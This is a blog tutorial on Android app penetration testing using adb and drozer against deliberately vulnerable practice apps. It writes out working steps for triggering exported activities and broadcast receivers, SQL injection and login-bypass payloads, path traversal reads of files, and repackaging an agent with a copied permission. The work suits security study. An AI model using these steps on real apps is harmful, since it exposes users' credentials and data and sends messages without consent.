Mobile Application Pentesting-Part4

Piyush Patil
May 17, 2019 · 8 min read

Access Control Issues

Part 1- Intent Filter Vulnerability

- The application allows to see the API credentials:

Now, our goal is to access this information, without clicking this button. Let’s see how to do it.

cat AccessControl1Activity.java

The “jakhar.aseem.diva.action.VIEW_CREDS” is the intent filter responsible for allowing the credentials to be displayed by the application.

Also, the AndroidManifest.xml indicates the presence of the mentioned intent filter:

If you notice the above piece of code, the activity is “protected” with an intent filter. The intent filter should not be treated as a protection mechanism. When an intent-filter is used with an application component such as activity, the component is publicly exported. For the same reason, this activity is vulnerable and hence it can be invoked by any application from outside.

using the Activity Manager tool we can start the intent filter jakhar.aseem.diva.action.VIEW_CREDS without using the DIVA application interface.

adb shell am start -a jakhar.aseem.diva.action.VIEW_CREDS

am: Activity Manager tool

start: To Launch an activity

The result is the application starting by itself and showing the API credentials:


DROZER

https://labs.mwrinfosecurity.com/tools/drozer/

Install drozer application in linux and drozer-agent in android.

Drozer mobile-agent

We will perform mobile pentesting using drozer on Insecurebank vulnerable application.

https://github.com/dineshshetty/Android-InsecureBankv2

Drozer Commands

run-Executes a drozer module

list-Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.

shell-Start an interactive Linux shell on the device, in the context of the Agent process.

cd-Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.

clean-Remove temporary files stored by drozer on the Android device.

contributors-Displays a list of people who have contributed to the drozer framework and modules in use on your system.

echo-Print text to the console.

exit-Terminate the drozer session.

help-Display help about a particular command or module.

load-Load a file containing drozer commands, and execute them in sequence.

module-Find and install additional drozer modules from the Internet.

permissions-Display a list of the permissions granted to the drozer Agent.

set-Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.

unset-Remove a named variable that drozer passes to any Linux shells that it spawns.

Lets start

ls=>to see all available commands

run module_name =>to run any module

To get list of all packages present in the device.

dz> run app.package.list

To search for a package name from the above list

dz> run app.package.list -f <your_string>

To get basic info about any selected package

dz> run app.package.info -a <package_name>


AttackSurface

This is the part where we start exploring vulnerabilities. We start with checking the number of exported Activities, Broadcast Receivers, Content Providers and Services.

run app.package.attacksurface package_name


Activities Enumeration

To get a list activities from a package

dz> run app.activity.info -a <package_name>

To launch any selected activity

dz> run app.activity.start — component <package_name> <activity_name>

The screen you are seeing will allow to change password without authenticating to the application. In this specific case, another person should have had an access to the device to be able to change password. However, there are cases when parameters can be passed to the activities being launched, and those activities would operate on the given parameters. It is important to keep that in mind when evaluating real-world applications (looking into the source code of exported activities would be warranted to determine whether it reads any parameters from an intent that was used to launch it).

Exploiting android broadcast receiver

As you see, MyBroadCastReceiver processes actions with name theBroadcast, it is exported and not protected by a permission, meaning that any app can create an Intentwhich will result in this receiver being triggered. In order to determine what this receiver can do, we need to look at the source code.

If we look into the source code, we would see that two parameters are being retrieved from the Intent:

String str1 = paramIntent.getStringExtra(“phonenumber”);

String str2 = paramIntent.getStringExtra(“newpass”);

Then, the code reads data stored in Shared Preferences, does some cryptographic operations, and at the end calls SmsManager.sendTextMessage().

run app.broadcast.send — -action theBroadcast — -extra string phonenumber 12345 — -extra string newpass fakefakefake

If we look at our Android device now, we will see that we are about to send an sms message. Setting a premium rate sms number and forcing users to send messages without their consent is one of the ways bad guys can be making money:


Content Provider Enumeration

To get info about the content providers:

dz> run app.provider.info -a <package_name>

The above content provider is named DBContentProvider, which can be assumed as a Database Backed Content Provider. It is very hard to guess the Content URIs, however drozer provides a scanner module that brings together various ways to guess paths and divine a list of accessible content URIs. We can get the content URIs with the following:

To get the content URIs for the selected package

dz> run scanner.provider.finduris -a <your_package>

We can now use other drozer modules to retrieve information from those content URIs, or even modify the data in the database.

To retrieve or modify data using the above content URIs:

dz> run app.provider.query content://blahblahblah — vertical

As in InsecureBank app there is no content related vulnerability.

Lets take sieve app which is vulnerable to this attack.

Checking for SQL injection and directory traversal

SQL INJECTION

run scanner.provider.injection -a com.mwr.example.sieve

run app.provider.query content://blahblahblah — projection “‘“

run app.provider.query content://blahblahblah — projection “* FROM SQLITE_MASTER WHERE type=’table’; — “

Or you can try manually injection in username and password field

For example:-

username=piyush’or’1'=’1' —

password=anything

DIRECTORY TRAVERSAL

run scanner.provider.traversal -a com.mwr.example.sieve

run app.provider.read content://blahblahblah/../../../../../mnt/sdcard/trytoaccessanything

To read the files in the file system

dz> run app.provider.read <URI>

To download content from the file

dz> run app.provider.download <URI>


Content Provider signature Vulnerability

Developer uses custom permission to prevent content provider from being vulnerable but it not sufficient,make sure permission are protected by signatures.

run app.provider.query content://blahblahblah

It saying inorder to open this content ,you need this permission:- android.permission.CONFIGURE_SIP

Lets decomplile the application

apktool d appname.apk

Go into AndroidManifest.xml ,copy the required permission (android.permission.CONFIGURE_SIP) and its dependencies like strings.xml variable and paste it into dozer apk AndroidManifest.xml.

apktool d agent.apk

Copy the permission ,android.permission.CONFIGURE_SIP into the agent.apk’s AndroidManifest.xml file.

apktool b agent/ -o new_agent.apk

Sign the new new_agent.apk

Signing Android Applications

-No certificate authority, unlike IOS

-Developers could generate their own certificates

-App signed with the public key, whereas the private key stays with the developer.

keytool -genket -v -keystore nameofkeystore -alias your_alias -keyalg RSA -keysize 2048 -validity number_of_days

keytool -genkey -v -keystore lol.keystore -alias piyush -keyalg RSA -keysize 2048 -validity 365

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name_of_your_keystore your_application.apk your_key_alias

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore lol.keystore new.apk piyush

jarsigner -verify -verbose your_app.apk

Printing the Signatures

keytool -printcert -file META-INF/RELEASE.RSA

META-INF/RELEASE.RSA=>this file is generated when you unzip(unzip app.apk -d folder) any android application.The name of the RSA file can be different.

Now try the same again

run app.provider.query content://blahblahblah

It worked.


Read Based content provider Vulnerability

run app.package.attacksurface package_name

run app.package.info -a package name =>it will show app permissions

So this means this app only have permission to use internet.

Lets take another app, Adobe reader.

This app have permission to read from external storage.

run app.provider.read content://blahblahblah/../../../../../mnt/sdcard/secret.txt

[path traversal vulnerability]


Service Enumeration

To interact with the exported services, we can ask Drozer to provide more details using:

To get details about exported services

dz> run app.service.info -a <package_name>

Piyush Patil

Written by

Reverse Engineering, Penetration Testing( Web, Mobile, IoT, Network, Infra)

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade